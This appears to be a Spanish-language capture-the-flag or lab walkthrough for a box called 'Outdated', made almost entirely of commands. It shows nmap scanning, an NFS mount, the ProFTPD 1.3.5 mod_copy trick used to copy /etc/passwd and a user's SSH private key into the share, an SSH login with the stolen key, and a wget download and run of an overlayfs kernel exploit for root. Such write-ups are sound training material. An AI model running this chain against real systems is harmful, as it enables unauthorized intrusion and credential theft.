nmap -A -p- -oA outdated 172.31.1.22 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210715132814.png Pasted image 20210715131022.png

nmap -sC -sV -O -p- -oA outdated 172.31.1.22

nmap -sU -O -p- -oA outdated-udp 172.31.1.22

Empezamos a ver nfs y despues seguimos con ftps.

showmount -e 172.31.1.22

mkdir /tmp/mnt_nfs

mount -t nfs 172.1.31.22:/var/nfsbackups /tmp/mnt_nfs

Pasted image 20210715132702.png

searchsploit proftpd 1.3.5

Pasted image 20210715132902.png

searchsploit -m 36803

Pasted image 20210715133009.png

nc 172.31.1.22 21

site cpfr /etc/passwd

site cpto /var/nfsbackups/passwd

Al final no podemos hacer nada con la informacion adquirida.

Pasted image 20210715133218.png

Pero vemos que daniel si tiene acceso a bin bash

Pasted image 20210715133545.png

cat /tmp/mnt_nfs/passwd

Pasted image 20210715133816.png

cd /tmp/mnt_nfs

nc 172.31.1.22 21

site cpfr /home/daniel

site cpto /var/nfsbackups/daniel

Pasted image 20210715134132.png

cd /tmp/mnt_nfs/daniel/.ssh

ssh -i id_rsa daniel@172.31.1.22

uname -a

Podemos ver que este sistema operativo tiene un exploit despues de correr LinEnum.sh

https://github.com/lucyoa/kernel-exploits/tree/master/overlayfs

Pasted image 20210715140132.png

Bajamos el archivo ofs_64 del url arriba.

python3 -m http.server 8888

wget http://10.10.0.12:8888/ofs_64

chmod +x ofs_64

.\ofs_64

Pasted image 20210715140216.png

boxes

copyright©2022 Cu3rv0x all rights reserved